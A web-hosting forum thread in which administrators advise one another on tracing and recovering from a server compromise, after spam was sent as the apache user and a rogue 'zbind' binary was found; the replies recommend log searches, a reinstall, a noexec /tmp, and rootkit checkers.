Looking for other ideas to find exploit

[codesmith]

About 1 week ago we realized our server had sent out about 1500 email messages. Only happened one time, sent as apache user. I looked through all the apache log files at the time of the mails being sent but couldn't find anything suspicious. Or anything else... started a sendmail log and left it at that.

Today, (and I can't believe I didn't see this before) I saw a program called zbind running as apache user. Definitely a baddie, killed it and found that it had been installed in /var/tmp/.a - all apache user. So since that file had a timestamp on it of about 2 weeks ago I looked through all the logs for everything right before that time. Nothing!

Any other ideas on how to find how this exploit happened? So far everything I've seen is as the apache user so hoping there's no root exploit. Ran chkrootkit and it came up ok.

 

[breun]

Check out Steps for Recovering from a UNIX or NT System Compromise at CERT.org.

 

[Traged1]

Do a grep through all the client's xferlog files, someone could have uploaded it to thier account and then sent it to your tmp folder.

If you find nothing, grep through all the access_log files for the name "zbind". Once you find out how they got in, close the hole, remove the app that was used and canled the client's account who must have been running an unsecure script. With zbind I think your system was compromised, there is no doubt that they have backdoors on your server now, and you should backup all plesk data and then format and re-install everyhting. Do not format and re-install untill you are confident that you have located the entry point of the exploit or they will just do it again.

you could try something like this:

#grep -r "zbind" /home/httpd/vhosts/*

Or,

#cd /home/httpd/vhosts/
#for i in * ; do grep -r zbind ${i}/httpdocs ; done

Which will produce the same results.


After re-install, immedaitely secure your tmp partition by editing /etc/fstab like:

LABEL=/tmp /tmp ext3 loop,noexec,nosuid,rw 0 0
#LABEL=/tmp /tmp ext3 defaults 1 2


then install mod_security

 

[Spazholio@]

In addition, run rkhunter and chkrootkit. We recently had an issue where certain system binaries (ls, cat, ps, etc) were replaced with hacked versions that hid the exploits.

Why, yes, that is nasty.

Actually, it's pretty standard behavior to cover your tracks, but running those 2 programs at regular intervals should help out immensely.

 

[Traged1]

Well you should also setup tripwire, and use the audinint functions of your OS to monitor ans test teh chechsums of the binary files. yes chkrootkit and rkhunter also chack sys binaries for md5 checksums differences, but you need to run these before the attack so that it can notice the change.

however, in most casaes it is safe to say that once the backdoor is open, you will have a very hard time trying to close it. Don't bother wating your time trying. It is much easier to close the front door which is how they got in to open the back door in the first place.